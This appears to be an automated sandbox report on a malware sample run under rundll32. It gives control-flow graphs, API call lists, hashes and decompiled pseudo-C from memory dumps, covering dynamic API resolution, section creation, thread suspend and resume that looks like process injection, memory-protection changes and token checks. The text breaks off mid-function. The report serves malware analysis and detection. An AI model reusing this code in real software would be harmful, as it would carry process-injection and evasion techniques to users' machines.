                                control_flow_graph 442 3478c35-3478c63 call 3493d64 call 34866d7 447 3478c69-3478c7a call 34733a5 442->447 448 3478d98-3478d9f 442->448 454 3478d90-3478d96 GetLastError 447->454 455 3478c80-3478ca9 call 347a253 447->455 450 3478db5 448->450 451 3478db8-3478dc4 call 3493d9f 448->451 450->451 454->450 455->451 459 3478caf-3478cb6 455->459 460 3478d13-3478d3c VirtualProtect 459->460 461 3478cb8-3478cbf 459->461 462 3478d47-3478d81 RtlEnterCriticalSection RtlLeaveCriticalSection call 34774ae 460->462 463 3478d3e-3478d42 call 347bdee 460->463 461->460 464 3478cc1-3478cd0 call 347ea5e 461->464 468 3478d86-3478d88 462->468 463->462 464->460 471 3478cd2-3478ce0 call 34733a5 464->471 468->451 470 3478d8a-3478d8e 468->470 470->451 471->460 474 3478ce2-3478cfa 471->474 475 3478d03-3478d0d VirtualProtect 474->475 476 3478cfc 474->476 475->460 476->475
                                APIs
                                  • Part of subcall function 034733A5: VirtualProtect.KERNEL32(?,?,00000040,?,?,?,00000000), ref: 034733CA
                                  • Part of subcall function 034733A5: GetLastError.KERNEL32(?,00000000), ref: 034733D2
                                  • Part of subcall function 034733A5: VirtualQuery.KERNEL32(?,?,0000001C,?,00000000), ref: 034733E9
                                  • Part of subcall function 034733A5: VirtualProtect.KERNEL32(?,?,-2C9B417C,?,?,00000000), ref: 0347340E
                                • GetLastError.KERNEL32(00000000,00000004,?,?,80000000,00000000,00000001,034960B0,0000001C,0348BE61,00000002,?,00000001,80000000,03499A20,80000000), ref: 03478D90
                                  • Part of subcall function 0347A253: lstrlen.KERNEL32(?,?), ref: 0347A28B
                                  • Part of subcall function 0347A253: lstrcpy.KERNEL32(00000000,?), ref: 0347A2A2
                                  • Part of subcall function 0347A253: StrChrA.SHLWAPI(00000000,0000002E), ref: 0347A2AB
                                  • Part of subcall function 0347A253: GetModuleHandleA.KERNEL32(00000000), ref: 0347A2C9
                                • VirtualProtect.KERNEL32(00000000,00000005,00000040,00000040,00000000,00000005,?,?,?,?,?,00000000,00000004,?,?,80000000), ref: 03478D0D
                                • VirtualProtect.KERNEL32(?,00000004,?,?,?,?,00000000,00000004,?,?,80000000,00000000,00000001,034960B0,0000001C,0348BE61), ref: 03478D28
                                • RtlEnterCriticalSection.NTDLL(0349A400), ref: 03478D4D
                                • RtlLeaveCriticalSection.NTDLL(0349A400), ref: 03478D6B
                                  • Part of subcall function 034733A5: SetLastError.KERNEL32(80000000,?,00000000), ref: 03473417
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Virtual$Protect$ErrorLast$CriticalSection$EnterHandleLeaveModuleQuerylstrcpylstrlen
                                • String ID:
                                • API String ID: 899430048-3916222277
                                • Opcode ID: 1e463f1ae869468e67b558967ee51f466d4b4717e2e031f083cfece403bbddc7
                                • Instruction ID: 96fc3411c7465af9b7e10f35155e126f0a505cc30ddeee6eff193fbbd97cc3af
                                • Opcode Fuzzy Hash: 1e463f1ae869468e67b558967ee51f466d4b4717e2e031f083cfece403bbddc7
                                • Instruction Fuzzy Hash: F7414775800619AFDB21DF69C849AEEBBF4FF18310F15821AE924AF250D774A950CFA4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                 [Control-flow graph rendered as an image in the original report; basic blocks 34855e4-3485719, with nodes calling VirtualAlloc, VirtualFree, lstrcmpi and StrChrA and subcalls into 34861ae]
                                APIs
                                  • Part of subcall function 034861AE: GetProcAddress.KERNEL32(?,00000318), ref: 034861D3
                                  • Part of subcall function 034861AE: NtWow64QueryInformationProcess64.NTDLL(00000000,00000000,?,00000030,00000000), ref: 034861EF
                                • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 0348561D
                                • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 03485708
                                  • Part of subcall function 034861AE: StrRChrA.SHLWAPI(00000018,00000000,0000005C,00000000,00000318,?,00000000,00000068,00000098,00000000,00000028,00000040,00000000,00000000,00000028,00000100), ref: 03486359
                                • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,?,?), ref: 03485653
                                • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 0348565F
                                • lstrcmpi.KERNEL32(?,00000000), ref: 0348569C
                                • StrChrA.SHLWAPI(?,0000002E), ref: 034856A5
                                • lstrcmpi.KERNEL32(?,00000000), ref: 034856B7
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Virtual$AllocFreelstrcmpi$AddressInformationProcProcess64QueryWow64
                                • String ID:
                                • API String ID: 3901270786-0
                                • Opcode ID: 98b8049805dbf1e3d0f9443b1d3a51f32dd403e8b4fe6e974d71e87d49e7f16e
                                • Instruction ID: d2aefa700fabab4efdfec193093835d1db977666a954a20c9957921cc2c66bf8
                                • Opcode Fuzzy Hash: 98b8049805dbf1e3d0f9443b1d3a51f32dd403e8b4fe6e974d71e87d49e7f16e
                                • Instruction Fuzzy Hash: 42318D71505301ABD321EF15DC40B2FBBE8FF86B54F15095AF988BA260D774D904CAAA
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 73%
                                			E0343402A(void* __eax, void* __ecx) {
                                				long _v8;
                                				char _v12;
                                				void* _v16;
                                				void* _v28;
                                				long _v32;
                                				void _v104;
                                				char _v108;
                                				long _t36;
                                				intOrPtr _t40;
                                				intOrPtr _t47;
                                				intOrPtr _t50;
                                				void* _t58;
                                				void* _t68;
                                				intOrPtr* _t70;
                                				intOrPtr* _t71;
                                
                                				_t1 = __eax + 0x14; // 0x74183966
                                				_t69 =  *_t1;
                                				_t36 = E034344DE(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16); // executed
                                				_v8 = _t36;
                                				if(_t36 != 0) {
                                					L12:
                                					return _v8;
                                				}
                                				E03437A1E( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
                                				_t40 = _v12(_v12);
                                				_v8 = _t40;
                                				if(_t40 == 0 && ( *0x343a300 & 0x00000001) != 0) {
                                					_v32 = 0;
                                					asm("stosd");
                                					asm("stosd");
                                					asm("stosd");
                                					_v108 = 0;
                                					memset( &_v104, 0, 0x40);
                                					_t47 =  *0x343a348; // 0x21ad5a8
                                					_t18 = _t47 + 0x343b3f3; // 0x73797325
                                					_t68 = E03437326(_t18);
                                					if(_t68 == 0) {
                                						_v8 = 8;
                                					} else {
                                						_t50 =  *0x343a348; // 0x21ad5a8
                                						_t19 = _t50 + 0x343b73f; // 0x55e8ce7
                                						_t20 = _t50 + 0x343b0af; // 0x4e52454b
                                						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
                                						if(_t71 == 0) {
                                							_v8 = 0x7f;
                                						} else {
                                							_v108 = 0x44;
                                							E034323AA();
                                							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0); // executed
                                							_push(1);
                                							E034323AA();
                                							if(_t58 == 0) {
                                								_v8 = GetLastError();
                                							} else {
                                								FindCloseChangeNotification(_v28); // executed
                                								CloseHandle(_v32);
                                							}
                                						}
                                						HeapFree( *0x343a2d8, 0, _t68);
                                					}
                                				}
                                				_t70 = _v16;
                                				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
                                				E03436C2C(_t70);
                                				goto L12;
                                			}

                                APIs
                                  • Part of subcall function 034344DE: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,03434046,?,?,?,?,00000000,00000000), ref: 03434503
                                  • Part of subcall function 034344DE: GetProcAddress.KERNEL32(00000000,7243775A), ref: 03434525
                                  • Part of subcall function 034344DE: GetProcAddress.KERNEL32(00000000,614D775A), ref: 0343453B
                                  • Part of subcall function 034344DE: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 03434551
                                  • Part of subcall function 034344DE: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 03434567
                                  • Part of subcall function 034344DE: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 0343457D
                                • memset.NTDLL ref: 03434094
                                  • Part of subcall function 03437326: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,034340AD,73797325), ref: 03437337
                                  • Part of subcall function 03437326: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 03437351
                                • GetModuleHandleA.KERNEL32(4E52454B,055E8CE7,73797325), ref: 034340CA
                                • GetProcAddress.KERNEL32(00000000), ref: 034340D1
                                • HeapFree.KERNEL32(00000000,00000000), ref: 03434139
                                  • Part of subcall function 034323AA: GetProcAddress.KERNEL32(36776F57,03437989), ref: 034323C5
                                • FindCloseChangeNotification.KERNEL32(00000000,00000001), ref: 03434116
                                • CloseHandle.KERNEL32(?), ref: 0343411B
                                • GetLastError.KERNEL32(00000001), ref: 0343411F
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                 • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmp
                                 • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmp
                                 • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmp
                                 • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ChangeErrorFindFreeHeapLastNotificationmemset
                                • String ID:
                                • API String ID: 186216982-0
                                • Opcode ID: 5045b949cbd0ebeb837cce314eb0652b23e57fc7a3e24e9b01007b70e7d9c733
                                • Instruction ID: 45e3d2be2ac49fc88a8ea0d7d48d0a391c3482f5a84a91f6bdd1bf5ea30d9452
                                • Opcode Fuzzy Hash: 5045b949cbd0ebeb837cce314eb0652b23e57fc7a3e24e9b01007b70e7d9c733
                                • Instruction Fuzzy Hash: 78317EB6800208BFDB10EFA6DC88EDEBBBCEB09304F10046AEA55FB211D7705A45CB54
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 034773EB: memset.NTDLL ref: 034773F5
                                • OpenEventA.KERNEL32(00000002,00000000,00000000,00000000,?,0347E2A4,?,?,?,?,?,?,?,03479100,?), ref: 03471381
                                • SetEvent.KERNEL32(00000000,?,0347E2A4,?,?,?,?,?,?,?,03479100,?,?,?,?,?), ref: 0347138E
                                • Sleep.KERNEL32(00000BB8,?,0347E2A4,?,?,?,?,?,?,?,03479100,?,?,?,?,?), ref: 03471399
                                • ResetEvent.KERNEL32(00000000,?,0347E2A4,?,?,?,?,?,?,?,03479100,?,?,?,?,?), ref: 034713A0
                                • CloseHandle.KERNEL32(00000000,?,0347E2A4,?,?,?,?,?,?,?,03479100,?,?,?,?,?), ref: 034713A7
                                • GetShellWindow.USER32 ref: 034713B2
                                • GetWindowThreadProcessId.USER32(00000000), ref: 034713B9
                                  • Part of subcall function 0348B1DC: RegCloseKey.ADVAPI32(0347E2A4), ref: 0348B25F
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Event$CloseWindow$HandleOpenProcessResetShellSleepThreadmemset
                                • String ID:
                                • API String ID: 53838381-0
                                • Opcode ID: 69fac00db842902a951f2233aaef80ddeb3388841509cb33167dfaba22aad192
                                • Instruction ID: 98b39b84f62dd23edaa223f738b5d70b6366a29ec3cec45ff1ce68e053e39cde
                                • Opcode Fuzzy Hash: 69fac00db842902a951f2233aaef80ddeb3388841509cb33167dfaba22aad192
                                • Instruction Fuzzy Hash: A2218636200210BFD211FB679C48EAF7BEDEBDA650F15410BF509AF644DB755401C769
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E03436C41(long* _a4) {
                                				long _v8;
                                				void* _v12;
                                				void _v16;
                                				long _v20;
                                				int _t33;
                                				void* _t46;
                                
                                				_v16 = 1;
                                				_v20 = 0x2000;
                                				if( *0x343a2fc > 5) {
                                					_v16 = 0;
                                					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
                                						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
                                						_v8 = 0;
                                						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
                                						if(_v8 != 0) {
                                							_t46 = E03436D63(_v8);
                                							if(_t46 != 0) {
                                								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
                                								if(_t33 != 0) {
                                									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
                                								}
                                								E03436C2C(_t46);
                                							}
                                						}
                                						CloseHandle(_v12);
                                					}
                                				}
                                				 *_a4 = _v20;
                                				return _v16;
                                			}

                                APIs
                                • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 03436C73
                                • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 03436C93
                                • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 03436CA3
                                • CloseHandle.KERNEL32(00000000), ref: 03436CF3
                                  • Part of subcall function 03436D63: RtlAllocateHeap.NTDLL(00000000,00000000,03435D7B), ref: 03436D6F
                                • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 03436CC6
                                • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 03436CCE
                                • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 03436CDE
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                 • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmp
                                 • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmp
                                 • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmp
                                 • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                                • String ID:
                                • API String ID: 1295030180-0
                                • Opcode ID: 27316c95eaff27e588dce27dcc3a77c53670283d435d340ac0f327df57b73161
                                • Instruction ID: 92a2899c59db9b4afd63116514b9ce6303be65cf5eed6bdb16b52db09050f97a
                                • Opcode Fuzzy Hash: 27316c95eaff27e588dce27dcc3a77c53670283d435d340ac0f327df57b73161
                                • Instruction Fuzzy Hash: 76213D7590020AFFEB10EF94DD84EEEBBB9FB09304F0400A6E951AB250D7759A44DF54
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 64%
                                			E03431D33(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                				intOrPtr _v8;
                                				intOrPtr _t9;
                                				intOrPtr _t13;
                                				char* _t19;
                                				char* _t28;
                                				void* _t33;
                                				void* _t34;
                                				char* _t36;
                                				void* _t38;
                                				intOrPtr* _t39;
                                				char* _t40;
                                				char* _t42;
                                				char* _t43;
                                
                                				_t34 = __edx;
                                				_push(__ecx);
                                				_t9 =  *0x343a348; // 0x21ad5a8
                                				_t1 = _t9 + 0x343b624; // 0x253d7325
                                				_t36 = 0;
                                				_t28 = E0343624E(__ecx, _t1);
                                				if(_t28 != 0) {
                                					_t39 = __imp__;
                                					_t13 =  *_t39(_t28, _t38);
                                					_v8 = _t13;
                                					_t6 =  *_t39(_a4) + 1; // 0x55e95b1
                                					_t40 = E03436D63(_v8 + _t6);
                                					if(_t40 != 0) {
                                						strcpy(_t40, _t28);
                                						_pop(_t33);
                                						__imp__(_t40, _a4);
                                						_t19 = E034324B3(_t33, _t34, _t40, _a8); // executed
                                						_t36 = _t19;
                                						E03436C2C(_t40);
                                						_t42 = E03435A07(StrTrimA(_t36, "="), _t36);
                                						if(_t42 != 0) {
                                							E03436C2C(_t36);
                                							_t36 = _t42;
                                						}
                                						_t43 = E03434162(_t36, _t33);
                                						if(_t43 != 0) {
                                							E03436C2C(_t36);
                                							_t36 = _t43;
                                						}
                                					}
                                					E03436C2C(_t28);
                                				}
                                				return _t36;
                                			}

                                APIs
                                  • Part of subcall function 0343624E: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,03431D4C,253D7325,00000000,00000000,?,75BCC740,034358D7), ref: 034362B5
                                  • Part of subcall function 0343624E: sprintf.NTDLL ref: 034362D6
                                • lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,75BCC740,034358D7,00000000,055E95B0), ref: 03431D5E
                                • lstrlen.KERNEL32(00000000,?,75BCC740,034358D7,00000000,055E95B0), ref: 03431D66
                                  • Part of subcall function 03436D63: RtlAllocateHeap.NTDLL(00000000,00000000,03435D7B), ref: 03436D6F
                                • strcpy.NTDLL ref: 03431D7D
                                • lstrcat.KERNEL32(00000000,00000000), ref: 03431D88
                                  • Part of subcall function 034324B3: lstrlen.KERNEL32(00000000,00000000,034358D7,00000000,?,03431D97,00000000,034358D7,?,75BCC740,034358D7,00000000,055E95B0), ref: 034324C4
                                  • Part of subcall function 03436C2C: RtlFreeHeap.NTDLL(00000000,00000000,03435E1D,00000000,?,?,00000000), ref: 03436C38
                                • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,034358D7,?,75BCC740,034358D7,00000000,055E95B0), ref: 03431DA5
                                  • Part of subcall function 03435A07: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,03431DB1,00000000,?,75BCC740,034358D7,00000000,055E95B0), ref: 03435A11
                                  • Part of subcall function 03435A07: _snprintf.NTDLL ref: 03435A6F
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                 • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmp
                                 • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmp
                                 • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmp
                                 • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                • String ID: =
                                • API String ID: 2864389247-1428090586
                                • Opcode ID: 0b2d623e084173e0fc28ab1ed8db4e6d695d391d9fd807a27f9474a098e385f6
                                • Instruction ID: 9b59561d345686503433121eb7b05b9dbb2f1d9d66a774c89388e343239c67e1
                                • Opcode Fuzzy Hash: 0b2d623e084173e0fc28ab1ed8db4e6d695d391d9fd807a27f9474a098e385f6
                                • Instruction Fuzzy Hash: 7511E3375002257B4A12F7B69C84CAF7AADCE8F55070A001BFD00AF204CB79DC0287A8
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 03431F7A: IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,055E89D0,03433F35,?,?,?,?,?,?,?,?,?,?,?,03433F35), ref: 03432047
                                  • Part of subcall function 03435634: IUnknown_QueryInterface_Proxy.RPCRT4(?,E7A1AF80,?), ref: 03435671
                                  • Part of subcall function 03435634: IUnknown_QueryInterface_Proxy.RPCRT4(?,A4C6892C,?), ref: 034356A2
                                • SysAllocString.OLEAUT32(00000000), ref: 03433F61
                                • SysAllocString.OLEAUT32(0070006F), ref: 03433F75
                                • SysAllocString.OLEAUT32(00000000), ref: 03433F87
                                • SysFreeString.OLEAUT32(00000000), ref: 03433FEF
                                • SysFreeString.OLEAUT32(00000000), ref: 03433FFE
                                • SysFreeString.OLEAUT32(00000000), ref: 03434009
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                 • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmp
                                 • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmp
                                 • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmp
                                 • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: String$AllocFreeQueryUnknown_$Interface_Proxy$Service
                                • String ID:
                                • API String ID: 2831207796-0
                                • Opcode ID: d5ab25e4ff5388ae3685fd256b1f9dccb0213cb4f5fc5d249d874463b05452e0
                                • Instruction ID: 0efae04b4424dc28be7debb64f8083c18979bd4ee2662295b988779ee87f0f09
                                • Opcode Fuzzy Hash: d5ab25e4ff5388ae3685fd256b1f9dccb0213cb4f5fc5d249d874463b05452e0
                                • Instruction Fuzzy Hash: F0417E36900609AFDB01EFB9C844AEFB7B9EF49210F14442AE914EF260DB71D905CB95
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • memset.NTDLL ref: 0347C5E7
                                  • Part of subcall function 0348212C: GetModuleHandleA.KERNEL32(?,?,?,?,?,0347111D,00000000), ref: 0348214D
                                  • Part of subcall function 0348212C: GetProcAddress.KERNEL32(00000000,?), ref: 03482166
                                  • Part of subcall function 0348212C: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,0347111D,00000000), ref: 03482183
                                  • Part of subcall function 0348212C: IsWow64Process.KERNEL32(?,?,?,?,?,?,0347111D,00000000), ref: 03482194
                                  • Part of subcall function 0348212C: FindCloseChangeNotification.KERNEL32(?,?,?,?,0347111D,00000000), ref: 034821A7
                                • ResumeThread.KERNEL32(00000004,?,00000000,CCCCFEEB,?,00000000,00000000,00000004,?,00000000,00000000,76C84EE0,00000000), ref: 0347C6A1
                                • WaitForSingleObject.KERNEL32(00000064), ref: 0347C6AF
                                • SuspendThread.KERNEL32(00000004), ref: 0347C6C2
                                  • Part of subcall function 03486DE0: memset.NTDLL ref: 034870AA
                                • ResumeThread.KERNEL32(00000004), ref: 0347C745
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Thread$ProcessResumememset$AddressChangeCloseFindHandleModuleNotificationObjectOpenProcSingleSuspendWaitWow64
                                • String ID:
                                • API String ID: 2397206891-0
                                • Opcode ID: f7d647d43d80facfcc5197cc7c0bafdb5363023670501b0a86f6a2f1840ae575
                                • Instruction ID: 8d2505144c455806324f2de0bedca18de61f4ee75feef87c46014e46911063f5
                                • Opcode Fuzzy Hash: f7d647d43d80facfcc5197cc7c0bafdb5363023670501b0a86f6a2f1840ae575
                                • Instruction Fuzzy Hash: 1C41B0B5900249AFDB21EF55CCC5AEE7BB9EF04344F1444ABE914AE210CB30DE51CB58
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetLastError.KERNEL32(?,?,80000000,00000001,?,034960C0,00000018,03474B2B,?,00000201,03499A24,034999DC,-0000000C,?), ref: 03485843
                                • VirtualProtect.KERNEL32(00000000,00000004,?,?,00000000,00000004,?,?,?,?,80000000,00000001,?,034960C0,00000018,03474B2B), ref: 034858CE
                                • RtlEnterCriticalSection.NTDLL(0349A400), ref: 034858F7
                                • RtlLeaveCriticalSection.NTDLL(0349A400), ref: 03485915
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: CriticalSection$EnterErrorLastLeaveProtectVirtual
                                • String ID:
                                • API String ID: 3666628472-0
                                • Opcode ID: bc6584ce35811cd4cb6b251faca893c0f2394bd651b36dce27ca1fcb2a250ab0
                                • Instruction ID: f512215994dcb64c1d0d3c78fa80c35a72c9240068278782a02dbf02f674c2e7
                                • Opcode Fuzzy Hash: bc6584ce35811cd4cb6b251faca893c0f2394bd651b36dce27ca1fcb2a250ab0
                                • Instruction Fuzzy Hash: 2F413A74900709EFDB11EF66C884A9EBBF8FF0A310B14859BE825AF210D7749A51CF94
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 03479394: RtlAllocateHeap.NTDLL(00000000,?,03480051), ref: 034793A0
                                • GetModuleHandleA.KERNEL32(?,00000020,?,00008664,?,0347C71A,0347C71A,?,03486EFA,?,0347C71A,?,?,00000000), ref: 03488F87
                                • GetProcAddress.KERNEL32(00000000,?), ref: 03488FA9
                                • GetProcAddress.KERNEL32(00000000,?), ref: 03488FBF
                                • GetProcAddress.KERNEL32(00000000,?), ref: 03488FD5
                                • GetProcAddress.KERNEL32(00000000,?), ref: 03488FEB
                                • GetProcAddress.KERNEL32(00000000,?), ref: 03489001
                                  • Part of subcall function 0347710A: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,76C84EE0,00000000,00000000), ref: 03477167
                                  • Part of subcall function 0347710A: memset.NTDLL ref: 0347718B
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$AllocateCreateHandleHeapModuleSectionmemset
                                • String ID:
                                • API String ID: 3012371009-0
                                • Opcode ID: f67da4c2862e6773dc799c5b68748b0935b897f0e5f676f603a9d66613e35ffb
                                • Instruction ID: 23c0f3f3ca44c0ed7a9c75fe071447e2dbfc082419315bfc3cb5638b2bf3fd05
                                • Opcode Fuzzy Hash: f67da4c2862e6773dc799c5b68748b0935b897f0e5f676f603a9d66613e35ffb
                                • Instruction Fuzzy Hash: F52189B0500A0AAFD721FFAAD885D6BB7ECEF16244B05452BE504DF305E774E9028B60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E034344DE(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                                				intOrPtr _v8;
                                				intOrPtr _t23;
                                				intOrPtr _t26;
                                				_Unknown_base(*)()* _t28;
                                				intOrPtr _t30;
                                				_Unknown_base(*)()* _t32;
                                				intOrPtr _t33;
                                				_Unknown_base(*)()* _t35;
                                				intOrPtr _t36;
                                				_Unknown_base(*)()* _t38;
                                				intOrPtr _t39;
                                				_Unknown_base(*)()* _t41;
                                				intOrPtr _t44;
                                				struct HINSTANCE__* _t48;
                                				intOrPtr _t54;
                                
                                				_t54 = E03436D63(0x20);
                                				if(_t54 == 0) {
                                					_v8 = 8;
                                				} else {
                                					_t23 =  *0x343a348; // 0x21ad5a8
                                					_t1 = _t23 + 0x343b11a; // 0x4c44544e
                                					_t48 = GetModuleHandleA(_t1);
                                					_t26 =  *0x343a348; // 0x21ad5a8
                                					_t2 = _t26 + 0x343b761; // 0x7243775a
                                					_v8 = 0x7f;
                                					_t28 = GetProcAddress(_t48, _t2);
                                					 *(_t54 + 0xc) = _t28;
                                					if(_t28 == 0) {
                                						L8:
                                						E03436C2C(_t54);
                                					} else {
                                						_t30 =  *0x343a348; // 0x21ad5a8
                                						_t5 = _t30 + 0x343b74e; // 0x614d775a
                                						_t32 = GetProcAddress(_t48, _t5);
                                						 *(_t54 + 0x10) = _t32;
                                						if(_t32 == 0) {
                                							goto L8;
                                						} else {
                                							_t33 =  *0x343a348; // 0x21ad5a8
                                							_t7 = _t33 + 0x343b771; // 0x6e55775a
                                							_t35 = GetProcAddress(_t48, _t7);
                                							 *(_t54 + 0x14) = _t35;
                                							if(_t35 == 0) {
                                								goto L8;
                                							} else {
                                								_t36 =  *0x343a348; // 0x21ad5a8
                                								_t9 = _t36 + 0x343b4ca; // 0x4e6c7452
                                								_t38 = GetProcAddress(_t48, _t9);
                                								 *(_t54 + 0x18) = _t38;
                                								if(_t38 == 0) {
                                									goto L8;
                                								} else {
                                									_t39 =  *0x343a348; // 0x21ad5a8
                                									_t11 = _t39 + 0x343b786; // 0x6c43775a
                                									_t41 = GetProcAddress(_t48, _t11);
                                									 *(_t54 + 0x1c) = _t41;
                                									if(_t41 == 0) {
                                										goto L8;
                                									} else {
                                										 *((intOrPtr*)(_t54 + 4)) = _a4;
                                										 *((intOrPtr*)(_t54 + 8)) = 0x40;
                                										_t44 = E0343190C(_t54, _a8); // executed
